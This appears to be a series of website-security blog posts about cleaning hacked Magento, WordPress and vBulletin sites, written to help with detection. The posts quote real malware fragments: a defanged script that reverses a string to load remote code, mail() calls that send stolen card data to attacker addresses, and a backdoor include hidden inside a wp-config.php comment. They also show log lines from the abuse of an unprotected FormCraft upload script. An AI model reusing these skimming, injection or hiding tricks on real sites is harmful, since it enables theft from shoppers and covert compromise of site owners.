Early this morning we got complaints from our clients mentioning that Norton was flagging Helpscout, a Help Desk System.

Some of the pages were triggering this warning

Upon a quick check at Norton Safe Web, we can clearly see that a few files (4) were flagged by them

We tried accessing those to see if there was indeed any malicious content in it but all of them led to a 404 - Not Found page. With that being said, all we can do at the moment is wait for Helpscout to ask Norton to review the Blacklisting status.

We worked on an infected Magento site that had unwanted pop-up ads when you visited it. The culprit was this injected script (spaces added intentionally)

<s c r i p t>document .write('>tpircs/<>"YzSBPWt9=i?php .war/moc . nibetsap / / :sptth"=crs tpircs<'.split("").reverse().join(""))</s c r i p t>

This code uses the reverse() JavaScript function to dynamically inject a remote script directly from Pastebin.com - https: / / pastebin . com/raw .php?i = 9tWPBSzY. That’s not the first time we see hackers leveraging the Pastebin service

This time the raw pastebin code uses the same reverse() trick to inject the final remote script from hxxp: / / lachinampa . com . mx/stat/. That script has the actual pop-up code that uses the blablatrafic .com as the intermediary between other ad providers.

In some cases, the same pop-up code injection was noticed on WordPress sites. So this isn’t limited to Magento and you should check your files and database even if you are using a different CMS. Or have us scan your site for you.

Lately we see waves of a strange WordPress infection.

It usually adds backdoor code at the top of theme files (footer.php, page.php, etc)

MyFileStore[.]com redirects from vBulletin sites have been a problem since 2011. It is associated with the VBSEO plugin with multiple unpatched vulnerabilities that has been discontinued for more than 3 year now. You can find more information about this hack here

Since then, the code remains pretty much the same. Only minor changes in variable names. Just search either the datastore table or the includes/datastore/datastore_cache.php file for = preg_replace( with strtr inside of it like:

...
$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), "vbseo");

Preceded by long gibberish stings that look like this:

...
$arrvb = '[R_=#AH_p[3"rP[abP[#Vj@?Vu=&_S?q!KZ`mu=8%$!zH8.:_T?&KuS"_K.:a}lLaxLN[}/g%>PL_K.nH$,7KuS}a8?}a}apW>L{Vj@bVugR!z?...

Despite the fact that that this hack is very old and VBSEO is no longer supported and should have been already removed from sites, we still regularly clean vBulletin websites affected by this infection.

Please, keep your sites software up-to-date. Secure it to prevent future break-ins.

We regularly find malware that tries to steal client credit card details from Magento sites. Hackers use a few tricks and slightly modify their code from time to time.

For example, we've seen multiple modifications of the code reported in this article. Instead of using HTTP requests to send data to their own site, hackers often just email the stolen data to their emails.

...
mail("tuyulaustrali@yahoo.com","$data10 From $data6|$data15", "$message");

To hide the email address they use the following modification:

...
$idkey = 'Y3NfdG9vbHM0dXNAeWFob28uY29t';
$name ="$data9 Payment";
$encode = base64_decode($idkey);
...
mail($encode, $salt, $payfull, $headr);

where Y3NfdG9vbHM0dXNAeWFob28uY29t decodes to cs_tools4us@yahoo.com

Regardless of the actual code, the best way to mitigate this issue is preserve integrity of Magento core files. The files hackers usually modify are:

app/code/core/Mage/Payment/Model/Method/Cc.php
includes/src/Mage_Payment_Model_Method_Cc.php

Of course, removing the malicious code is not enough. You should find and close security holes to prevent reinfections.

There are many tricks to hide malicious code. One of them is placing it to the part of legitimate files where people don't normally expect to see executable code so they don't skip such places during manual reviews.

Comment blocks are one of such places. For example, this is a comment from an infected wp-config.php file found by our security analyst Brandon Benavente. Can you spot the malware there?

/**#@+
 * */include /*Authentication Unique Keys.
 *
 * Change these to different*/"\x2fhom\x65/...skipped...\x2fpub\x6cic_\x68tml\x2fwp-\x63ont\x65nt/\x75pgr\x61de/\x6cogi\x6e.ph\x70";/* unique phrases!
 * You can generate these using the {@link http://api.wordpress.org/secret-key/1.1/ WordPress.org secret-key service}
 *
 * @since 2.6.0
 */

I hope, you noticed, that hackers use / and / to close the multiline comment block and open a new comment block. And between them they placed executable PHP code, which may look as a part of the comment. To make it even less prominent, they even split the code in two pieces on two different lines.

include on one line and "\x2fhom\x65/...skipped...\x2fpub\x6cic_\x68tml\x2fwp-\x63ont\x65nt/\x75pgr\x61de/\x6cogi\x6e.ph\x70"; two lines below.

Since PHP interpreter skips everything in comment blocks, the real code that it sees is:

include "\x2fhom\x65/...skipped...\x2fpub\x6cic_\x68tml\x2fwp-\x63ont\x65nt/\x75pgr\x61de/\x6cogi\x6e.ph\x70"; 

or, after decoding:

include "/home/...skipped.../public_html/wp-content/upgrade/login.php";

Basically, hackers created a wp-content/upgrade/login.php file with malicious code. To execute it every time when someone loads any WordPress pages, they included that file into wp-config.php. This way the only changed core WordPress file is wp-config.php - the file that is never updated during WordPress updates and the file that normally not checked for integrity because it has custom code (keys, DB credentials, custom settings) and is different on every site.

This means that, depending on the tools you use, you might not be alerted about the file change, so you'll need to review it manually. And when you do it, remember about tricks like this. On one hand, using a code viewer with syntax highlighting may help. On the other hand, make sure you have a backup copy of your wp-config.php. Whenever you are not sure in its integrity, just restore it from a clean backup copy.

Cleaning and protecting websites may be a challenging task. If you need a professional help, you can always count on us.

As we clean many sites infected by the VisitorTracker malware, we see vulnerabilities in multiple plugins being exploited by attackers.

For example, my colleagues John Castro and Marc-Alexandre Montpas analyzed many sites where hackers exploited quite an old version 1.4.6 of the FormCraft premium plugin (current version is 3.2.4). FormCraft 1.4.6 contains a file upload script that is not protected in any way. Which makes it really easy for an attacker to upload backdoors on vulnerable sites.

And here are logs entries that show how this vulnerability is being exploited in the wild:

92.63.87.87 - - [24/Sep/2015:04:56:20 -0400] "POST /wp-content/plugins/formcraft/file-upload/server/php/index.php HTTP/1.1" 200 180 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
92.63.87.87 - - [24/Sep/2015:04:56:21 -0400] "POST /wp-content/plugins/formcraft/file-upload/server/php/index.php HTTP/1.1" 200 198 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
92.63.87.61 - - [25/Sep/2015:10:43:50 -0400] "POST /wp-content/plugins/formcraft/file-upload/server/php/index.php HTTP/1.1" 200 184 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"

Remember, both free and premium plugins and themes should always be up to date. If you can't update some software, you should remove it from your server. Alternatively, consider virtual patching provided by Website Firewalls